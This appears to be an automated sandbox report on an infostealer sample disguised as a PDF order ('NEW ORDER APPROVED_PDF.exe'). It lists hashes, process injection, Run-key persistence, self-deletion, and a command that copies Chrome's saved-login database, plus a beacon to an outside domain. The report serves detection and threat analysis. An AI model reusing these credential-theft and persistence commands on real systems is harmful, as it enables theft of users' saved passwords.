Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
141s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13/07/2020, 13:32 UTC
Static task
static1
Behavioral task
behavioral1
Sample
NEW ORDER APPROVED_PDF.exe
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
NEW ORDER APPROVED_PDF.exe
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
NEW ORDER APPROVED_PDF.exe
-
Size
368KB
-
MD5
c3782f33095e240a6c570b8d1265eaa4
-
SHA1
e40c6809253127c918848e2db3173205c12d3def
-
SHA256
6023812166224ffe7f3ff3efacddccd27c4ae1f09aa2dc9e2f5c8557d6bb4382
-
SHA512
9138e8059fe1b00d9a6522b984a5134a39508a45f2d4b4bfb89c9843cc8ca161f2960ab2aa4fee25c8cc8fc6398b9d00beddccf126432233d75fd40792681677
Score
8/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 67 IoCs
pid Process 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 2024 NEW ORDER APPROVED_PDF.exe 3708 NEW ORDER APPROVED_PDF.exe 3708 NEW ORDER APPROVED_PDF.exe 3708 NEW ORDER APPROVED_PDF.exe 3708 NEW ORDER APPROVED_PDF.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2024 wrote to memory of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 2024 wrote to memory of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 2024 wrote to memory of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 2024 wrote to memory of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 2024 wrote to memory of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 2024 wrote to memory of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 3012 wrote to memory of 2528 3012 Explorer.EXE 72 PID 3012 wrote to memory of 2528 3012 Explorer.EXE 72 PID 3012 wrote to memory of 2528 3012 Explorer.EXE 72 PID 2528 wrote to memory of 3844 2528 explorer.exe 73 PID 2528 wrote to memory of 3844 2528 explorer.exe 73 PID 2528 wrote to memory of 3844 2528 explorer.exe 73 PID 2528 wrote to memory of 2220 2528 explorer.exe 77 PID 2528 wrote to memory of 2220 2528 explorer.exe 77 PID 2528 wrote to memory of 2220 2528 explorer.exe 77 PID 2528 wrote to memory of 844 2528 explorer.exe 79 PID 2528 wrote to memory of 844 2528 explorer.exe 79 PID 2528 wrote to memory of 844 2528 explorer.exe 79 -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2024 set thread context of 3708 2024 NEW ORDER APPROVED_PDF.exe 71 PID 3708 set thread context of 3012 3708 NEW ORDER APPROVED_PDF.exe 55 PID 2528 set thread context of 3012 2528 explorer.exe 55 -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 3708 NEW ORDER APPROVED_PDF.exe 3708 NEW ORDER APPROVED_PDF.exe 3708 NEW ORDER APPROVED_PDF.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe 2528 explorer.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ZHLD7BMX = "C:\\Program Files (x86)\\Wdf-l_rc\\updateopx.exe" explorer.exe -
description ioc Process Key created \Registry\User\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 explorer.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2024 NEW ORDER APPROVED_PDF.exe Token: SeDebugPrivilege 3708 NEW ORDER APPROVED_PDF.exe Token: SeDebugPrivilege 2528 explorer.exe Token: SeShutdownPrivilege 3012 Explorer.EXE Token: SeCreatePagefilePrivilege 3012 Explorer.EXE Token: SeShutdownPrivilege 3012 Explorer.EXE Token: SeCreatePagefilePrivilege 3012 Explorer.EXE Token: SeShutdownPrivilege 3012 Explorer.EXE Token: SeCreatePagefilePrivilege 3012 Explorer.EXE Token: SeShutdownPrivilege 3012 Explorer.EXE Token: SeCreatePagefilePrivilege 3012 Explorer.EXE Token: SeShutdownPrivilege 3012 Explorer.EXE Token: SeCreatePagefilePrivilege 3012 Explorer.EXE -
Executes dropped EXE 1 IoCs
pid Process 3708 NEW ORDER APPROVED_PDF.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Wdf-l_rc\updateopx.exe explorer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\NEW ORDER APPROVED_PDF.exe"C:\Users\Admin\AppData\Local\Temp\NEW ORDER APPROVED_PDF.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\NEW ORDER APPROVED_PDF.exe"C:\Users\Admin\AppData\Local\Temp\NEW ORDER APPROVED_PDF.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:3708
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Adds Run entry to start application
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
PID:2528 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\NEW ORDER APPROVED_PDF.exe"3⤵PID:3844
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:2220
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:844
-
-
Network
-
Remote address:8.8.8.8:53Requestwww.gregory-buisson.comIN AResponsewww.gregory-buisson.comIN A164.132.235.17
-
GEThttp://www.gregory-buisson.com/twb/?8pFT8Rcp=YvR3cyAgllIFnwYwjPxO99LurnJ/Yx/yP7TZerE+Sc3kpkPZ6q9FF75jUJE=&EzutZl=OFQpiBGpL2NExplorer.EXERemote address:164.132.235.17:80RequestGET /twb/?8pFT8Rcp=YvR3cyAgllIFnwYwjPxO99LurnJ/Yx/yP7TZerE+Sc3kpkPZ6q9FF75jUJE=&EzutZl=OFQpiBGpL2N HTTP/1.1
Host: www.gregory-buisson.com
Connection: close
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: Apache
X-Powered-By: PHP/7.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://gregory-buisson.com/twb/?8pFT8Rcp=YvR3cyAgllIFnwYwjPxO99LurnJ/Yx/yP7TZerE+Sc3kpkPZ6q9FF75jUJE=&EzutZl=OFQpiBGpL2N
Set-Cookie: SERVERID31394=2320143|XwxjC|XwxjC; path=/; HttpOnly
X-IPLB-Instance: 17202
-
164.132.235.17:80http://www.gregory-buisson.com/twb/?8pFT8Rcp=YvR3cyAgllIFnwYwjPxO99LurnJ/Yx/yP7TZerE+Sc3kpkPZ6q9FF75jUJE=&EzutZl=OFQpiBGpL2NhttpExplorer.EXE444 B 706 B 6 4
HTTP Request
GET http://www.gregory-buisson.com/twb/?8pFT8Rcp=YvR3cyAgllIFnwYwjPxO99LurnJ/Yx/yP7TZerE+Sc3kpkPZ6q9FF75jUJE=&EzutZl=OFQpiBGpL2NHTTP Response
301